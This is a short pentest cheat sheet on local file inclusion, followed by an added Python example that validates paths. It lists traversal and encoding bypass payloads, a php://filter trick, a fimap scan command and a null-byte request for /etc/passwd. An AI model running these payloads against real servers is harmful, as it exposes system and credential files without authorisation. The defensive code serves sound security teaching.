LFI
# https://github.com/kurobeats/fimap
fimap -u "https://example.com?test="
Wget
Browsers sometimes rewrite basic directory traversal sequences before sending the request, but wget may work:
wget "http://[host]/page.php?url=../../../../../../../file.html"
Tricks
- PHP filter with base64 output (php://filter/zlib.deflate/convert.base64-encode/resource=FILE)
- Null byte ending (%00)
- The 403bypass section may help
Bypasses
Nesting traversal sequences
....//
....\/
..../\
....\\
URL Encoding
dot %2e
forward slash %2f
backslash %5c
Double URL Encoding
dot %252e
forward slash %252f
backslash %255c
Null Byte
Some applications check whether the user-supplied file name ends in a particular file type or set of file types, and reject attempts to access anything else. A null byte terminator (%00 URL-encoded, 0x00 in hex) stops processing of the string at that point, so any bytes following it are ignored.
http://website/page=../../../etc/passwd%00
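A defender's view of the bypasses listed above, as an added example that is not part of the original page: a single-pass strip filter next to a check that decodes, rejects null bytes, canonicalizes and enforces containment. `BASE_DIR` and all function names are assumptions for illustration, and the sample inputs are constructed.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/pages"  # assumed base directory (not from the page)


def naive_filter(name: str) -> str:
    """Weak form: strips traversal sequences in one non-recursive pass."""
    for seq in ("../", "..\\"):
        name = name.replace(seq, "")
    return name


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable, so %2e and %252e both become '.'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_safe(name: str, base: str = BASE_DIR) -> str:
    """Decode, reject NUL, canonicalize, then require containment in base."""
    name = fully_decode(name)
    if "\x00" in name:
        raise ValueError("null byte in file name")
    name = name.replace("\\", "/")  # treat backslash as a separator
    full = posixpath.normpath(posixpath.join(base, name))
    if posixpath.commonpath([base, full]) != base:
        raise ValueError("path escapes base directory")
    return full


def is_rejected(name: str) -> bool:
    try:
        resolve_safe(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample inputs modelled on the sequences listed above.
    for sample in ("about.html", "....//....//etc/passwd",
                   "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
                   "..%5c..%5c..%5c..%5cetc%5cpasswd", "../../../etc/passwd%00"):
        print(repr(sample), "rejected" if is_rejected(sample) else "allowed")
```

Because `resolve_safe` never strips anything, `....//` stays a literal directory name under the base directory; it only turns into `../` when a filter such as `naive_filter` removes the inner sequence.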